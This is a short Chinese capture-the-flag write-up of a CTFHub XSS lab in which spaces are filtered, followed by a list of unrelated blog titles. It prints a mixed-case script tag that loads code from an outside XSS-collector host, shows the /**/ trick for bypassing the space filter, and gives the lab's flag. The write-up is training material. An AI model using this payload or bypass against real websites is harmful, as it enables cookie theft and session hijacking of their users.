CTFHUB技能树之XSS——过滤空格

开启靶场,打开链接:

看上去是GET传参,有点像反射型的那题


在第一个输入框中输入:

<sCRiPt sRC=//xs.pe/6b6></sCrIpT>

没什么反应,右键查看源代码:

发现<sCRiPt sRC=//xs.pe/6b6></sCrIpT>中的sCRiPt和sRC之间的空格消失了,对空格做了过滤处理


用/**/绕过:

<sCRiPt/**/sRC=//xs.pe/6b6></sCrIpT>

提交之后再复制地址栏中的URL,粘贴到第二个输入框中提交:

成功得到flag:

ctfhub{5f10e129d697165a8083b5be}

相关推荐
Zayn3 分钟前
JavaScript 小数精度问题
前端·javascript
西维4 分钟前
高效使用AI从了解 Prompt / Agent / MCP 开始
前端·人工智能·后端
王廷胡_白嫖帝8 分钟前
Qt文件压缩工具项目开发教程
java·开发语言·qt
110546540120 分钟前
35、自主移动机器人 (AMR) 调度模拟 (电子厂) - /物流与仓储组件/amr-scheduling-electronics
前端·javascript
SuperYing23 分钟前
还在为调试组件库发愁吗?yalc 帮你一把
前端·npm
跟橙姐学代码29 分钟前
Python 高手都偷偷用的 Lambda 函数,你还在傻傻写 def 吗?
前端·python
Eddy29 分钟前
useEffect最详细的用法
前端
渣哥33 分钟前
Java开发必看!序列化与反序列化到底有多重要?
java
一枚前端小能手34 分钟前
🎨 用户等不了3秒就跑了,你这时如何是好
前端
Eddy37 分钟前
什么时候应该用useCallback
前端